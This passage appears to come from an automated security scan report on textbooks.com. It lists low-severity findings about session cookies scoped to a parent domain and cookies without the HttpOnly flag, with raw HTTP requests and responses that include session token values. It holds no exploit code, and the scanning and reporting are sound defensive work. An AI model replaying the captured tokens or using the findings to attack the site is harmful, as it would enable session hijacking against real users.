mH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:51:57 GMT
Set-Cookie: TBSESSION=RCVA2ltk80NW5Jf0Wl2Hp4znffWSrQPDUOtKIA0u%2FqlL%2FjYVd9r7rK57RoHO3klBemBEgmBjtjvqvzgYhIp7eeLgDA0I9MrFfURtlqwtx2BKN1IzFW4VuXlqki%2FIkLRfXjm71k0alz0rL9l4RKuXms1dz6YxpQlfct0kt2KO0nEqx9%2BJZwh8ydTHKfsSpN7asjXPWt9h1ZwYKBsJpAeil6JLAb91657JBthMgkmCg1dWpyOFt%2BO2%2F6IuWFiBvyfeDqld2XYdPmwncoE8r6H%2BiVS5foiEy7Obglt6qPLPrO8CnwOaGcTCUn9GIPasy266mXMSTxo0ZHFN5z7D%2FMi15PhmDLLLcVW9NDAa%2FZtn0z7Aic55u9ajBWXJje2dG5j%2Bwex47GhkRb8SCxa3h9eYD%2BFF8ODsBw8fKdAE9fJhe5sX%2BGSaDH%2BblHWcaDvOD%2BuAHHVC9867%2B8IVRD9A32ieqt2eWyCzXbPmyuAst2gKg8riGQ%2Bd0lFPTMmQkk%2FNvKgMcR5uxwUaiYK8OrTmO73yRrtAUjTDKt2fg5h2DMXa4g%2FUFbpL%2FBacwzt9qk6Qb4HbW2ALDFrKULxNGBQ0zGDrCy%2B0gRX%2ByS0XNKnGUzF%2FjsRLCRxSbeGmexVSotL%2FxQC7HJGtLp0EJGcsuyMXOTyFUuCvkxrHpaa8TjORbwlnxc33ZKOZYz9oh21tfBmWeSFFiQzRBMMMgGLgIMst99cK6FRxOPUF0Y9fQuKqJVCeEwCD8Ap6XRE0LwljO69yT6txlmkuUYSR5czrJH87PwlN%2B6EOzOJSQx05kVzChR8bdRUIacjCSLcxPeBAdFuHDsDAoOMGLxcRafAmk1RtanCiUFE6YO2rXCOjadz7bR%2FxELgt%2BLrYjgq8Nt%2FZ70rAyyE4Qbwm1XKfIy8i0YqG3jmQ6I6ZQyps%2FWburUYbt7DYRjkSxUE%2F%2BDleyB4Pv7WZEJ0v8z7v3lVDq0sfn%2BxvMZVWAfF1gee3wmf2nKxU87adO9iljyBUVtjb1%2BYSuwnjro4eSz0oeR4WFBqfyp%2BeHZmSIavq3Y00rvB6zoqcbqZ4i4eoe1gJc3vVBuz9n5gP4BMqLMl%2FEbWIywFxbZFNv1M8OlyfFZBbl9kpUzfdnC1HrJFyHp%2BM%2B9LbayuCXGHH4s8wF4ancGqr2XUICaF9IngzURcvFPuEULoLBBd4H%2FCqrbpoJdoSs5%2Fbn6H2UYrgjEbyataNxKwmptLaIAGUWe6CNKE68aVDc8TV88fKIkK0LJm8vRfrr4clbcysIn4%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=skRZMuAwUsugbpdzDo0%3D; expires=Mon, 26-Dec-2011 13:51:58 GMT; path=/; domain=.textbooks.com
Content-Length: 36639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.27. https://www.textbooks.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=ZX8GKynTOuWErN2bcxdglGgKUSVXmfokmfizdb6fXTI%2BkR6D8IpmlJEj8xLbFZnS%2BJJGCtOuN%2FOKVTrOLZcOjsEyXvfO3m%2FWjiS3Tov2DxWx9fYSBrvdGp1zFD%2BnDX4xGxk1gggjoyAKhSzCtlGPUE6nWxB1csyqQN49pxfSslBvn6mLxmBpHtLY2qr5rtRu9tnlKVxOXq7%2FlHpIlh5xb4ra9riQLAee%2FazWSBVImIIDygqP7JOCyi6pFbzhv9vg%2FS0Sg3qb1xgVTopYw%2BaVBJ22tR1fBdfZmD7U44lVQInfrgOocBPveCj%2B7GY2C0J8oh%2BZVK9Xt1%2FzOM0DBLjPABq1sI%2BiMRhJJrfgsS3iPVywEwpg%2F78enCbB2lHrUmr%2F7Lw3c5pV7kLIP%2FEEHyAbsSI9qhrUO1aAYrSPF7TcIiKJy0v1aMpBnUxS6NEF1Jdlpe8SXxtioOeQSmm1MeCzJnTK%2BQgoHNyZe4GIRgmzWKiWy4JjMdtuR1KYjgTFXn4l0nrhzC0HPucbs8NP%2FksPlrq%2BEC%2BNotrXpkmBW8G9fryo6eUnfBOJFg6vKHxLPbPuJBECFWXyOdR%2BqXpZdJazoXunYU1UxyscQzPrneA5uvC%2FxLBEn2QwJJGlXdmVR1Q5cA7tNdCc%2Bcu1Me0cycGyudiSiiyCJEwVsXhU3jxSS7r%2B6zpbwHKFwdEUEZcoNJvwZuinnH020ZwqBqODaagXOsOoW9JBCcUrqSx7ZiFrd7O8xoDt7aBSXwyk7AcvSw%2BEZUJN3Vku51lf2Pv%2Fa7MKxWN4sYPWZbBw5KF4soeZ0%2Fvnq2lMMJYoGjUjvd%2BaDZeJSpTafw3qbOe%2FvQiTCkxkEySfXUllj8UI2b82MFZBC6nPV3te%2BOzRsT7D3bgZ3JULOFVZnYK3NNfmkQvW7w7PWd%2FcaqffTehBhIMhdPQcED7H7X5RO7M84QxIn0rnhyNsDWFMmJ1433jiBv4H71uqgQfEBtmMqu9dMOyXG4SkVJoia5HgtyWaejvNKkYBhsqc0DnJ0XPJ8GvSlToFgL3O2iMRulEwx%2FxUuCi0oX0gyMm%2FdUj4ASoSPZcLR7MGHdnmpCHYuxrIEcxmin75yo13LkVZCbZyNWHUWG6NBN15WVJgJ3COQlGxX8lBuInrftfMkqy4tGZ%2BHBZRrFGTm8ULKVJXPjqLOCqcc1gk3hk1KgDCsZEe4XIyBnLVY6zU62RlabQRw8iypVhzrzZDdHBPOTcaAuNXPPnO3Zj13u7ZCzzXPk1ipoRZtpBeOPU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=b%2Bc21UkT1sQaFcBDQHk%3D; expires=Mon, 26-Dec-2011 13:51:33 GMT; path=/; domain=.textbooks.com
Content-Length: 35362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.28. https://www.textbooks.com/account.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /account.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:27 GMT
Set-Cookie: TBSESSION=HcVwmiPPLgvSivqJfoVmbt5gEZEgOp9Y6lox26AAXxDEjyif4Rkxly04sOZvg82jolcnT4y6M%2BzialsUEUiwtzC0zrDbjKsCRQsp6nd0%2BYtymVfLwc1Yl1g5o907kAXdJIgxb0amVLjTSzKlHgNQRwbvpNwW76WEWfJgBamgPBB1CyWrWBKzeeKIhhY343NcQGrHiNaXnjrKVHVu%2Bo1FGhpfdJaYnCAfOIJQWUtjeAhtQIj4quQwNpSvMYD1b8TmjOhnYOWRnvTXeqm5NHUK7qQq%2FjkS5iz60x3gyYSEBVIhshq7j7g4YM0YXpFUYZDYHOEpSIGyenfLHHsn02GIkFloCqa4AuzSEi8ZsCHgjI8mVN45YshZiUjIF7tAwShLwqZZ10UTxjftbLiTqUtgMOcN67A07SzT%2Bm0CKRleBxf9wiQQ%2FvyPtCYTJvei%2B5mqLbm991T4AxxBpJaEI%2BUgDwazAslsjkY4JIUy7YLGVJwu%2FBujjdU%2FTicgb%2Ff1z50%2Bpdn%2BLvuTlVyZfbbcaO6yutU55v6C1IJgRNCR%2FPIT0AqXdLBtKmafMSR%2BWspB3f1XB%2BauptSiRiRi93k1tJ2TwXiBPYKI%2BRJiptUrodZoDdGPwSkW63j4HAsLMpEEwfVov%2FvhWHHnjXic9UZVVGm7ulnspI3MlyxiuyEkDmJ1H8fhwSKQmtApkbumDH3pkz2D7kQSsglPowig%2FdlGUHoKTCNU573VqDUMoTeMAR7XhCZ6v4S4ViJnwVtKsv38xYZRzTijBe7xXX%2F4N0dVw7HgjK2xAYd2fNmOqn%2BX8H9BXQATUukdlq35nT%2FxoAVQqKcq046rXaTIcEraJgyGeFWZjugdBW%2BRPcqdZCrFw04L6LLv6r9TYvHwV%2Fg%2BlPBxSUjhQ1Wxu89rfRkRYFK036RbCcN%2B%2BDhOv%2Bnrvq6Lj2%2F8kO1AuI%2BMXWikfGbD4%2B03CwVPLlEHLKQI4cXZ9slTe%2Fzqvbh9Gd1Qurod%2FlXpNHZbgZ2U%2BM0pEnAmLIL93PWUT4ArNJHraqKPWK31tkUf1%2FDNmOW8xoEmwRBTC5GWmn9uiQVx5CT4QM8ecUE8hSiWxuveHAUMCzEDL9S7n6OlrWM856CqXGQKpQfittBjcx4mixKTRRV4yO8aLteM3jw3BpT45djSHDbibcFUVoM8ZzdrStw9PbT2JLjG6PlxHnjuXl7mNADGH6oIrppH1mDuh%2Bi0xp0uRXcgEgYyUFcHHmQlYllBMMLpj7A0AzPTtuvk7mCLB3xCiydJVPQZPGk%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=m2sT%2BeW4bxWwrRneS60%3D; expires=Mon, 26-Dec-2011 13:53:28 GMT; path=/; domain=.textbooks.com
Content-Length: 33655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.29. https://www.textbooks.com/checkout.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /checkout.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /checkout.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:30 GMT
Content-Length: 24992
Connection: close
Set-Cookie: TBSESSION=GN%2Bu2RH0zu72InyE7yjEtHseOWko2s6C3Nnu%2Bel02ruAFXvxPxqzfstCuA9ufemgaVoW15o7ehfaiR3lXYev5Hl28gWQjGdp4r62cntl8Ppe%2BQB%2B%2F0PnTWSxzxnfeNqCXausL%2FDZQfxUHbZa9YobNMc8nhhywgxyfre46xwN%2FdJR8Nt8THau6QM%2FBcr5%2F541p6%2BsumwfXZERaEEcWeO7wcXn17Rv8%2FpFFZGks%2BIFbkjavKs9dmHpL7BrI2pt6sPQHd6b%2F2deduiP0eCPe1QyoIAGILwFRS1VriIsFzQzNIade%2BzmnH7SXXYtPwyEg9JZ4dcMkuab51A0Rbyy9BeTp%2FoQEc1rmertrtbWBb43SpmFMl1pXIEcwpTMwaOPsLcgAzKdCVWtHQM2y74Ilusj5dymYdWvCF0AFv72joZNh9xAOIj00moAbgiQvYm3YjgRybXPW9WGZyM%2BgfKSvc5swAJwYxW37jqjz99uCNVTm3zBmW39bUFF2gxAf3vZvMdxtqk5ozLzxiVXd0bxt4anKXczZx9bhqV9FBaehw5XylsCdUi3r%2Bvq1zaC5pHseIvr9%2BPEglegFQ%2B%2FcB%2Fdj5fO8ARg4iNt6%2FaYMgig5ah41Qu95hVCN7SsCNUFXdOlTgBfeobXgKKT0iSxNsimPxBfoTfpzMy%2Fby4BPcBbdT%2FfI1N3RhYOJLeAdCeujM8Zf2kK%2BQt5gzaEz7H0ARx%2FooJKRBqTMkKWw1Bbiu2usiUDsWDbH7mBiYYr5JoOUqU%2BgmlbkpdpH3IwQHihGE41zVNOEH44siHFWYUggG3CvTI3fDrDddZZgwv%2BaAdExM3QJScmaz2VVVGi7%2FXqU9OnyHVOusBLag9o5vRGT8SpjfoBv00CAehyb%2FnlDPlfmTR2ub2vbwjSxDFRz60oue41qDXfDZGyy8izPa293C2Uw98B2R7%2BxtYJBj895DBpW16w4bActPCnt2Fsxga7UPsKbwH5T5WruVPnmFOBV5GdnvIYNip%2Bt7kJhz1cg1pPGwRsVDHx5f4MMG70GQNe2HZGXDcb%2BPjlKHpSRYceIYzY1DbVka1dTaJ5HB7biPNlqni%2FRLgbvpxRYK4c4cUuwZw90NqaYAYBCZ2hXQBVYl%2FCi4xZnnjYBdK06nekOvzbvYBHOYXbbtnd4A1P0kMPaIJJEhLoeQBCR%2Bzb0%2Bs1d2Amp0nBVVDBvJEwSH6AeHJ2wNFvE%2BK9jjxqBBs0wqkLl%2F0OccXwsuWFBpSUUPPdJ4qm4Y8r%2FMp7FUkd6mjJblkV4kY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=9vc8KFkiyfVkIilGB6Y%3D; expires=Mon, 26-Dec-2011 13:53:30 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="ke
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 29 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.textbooks.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
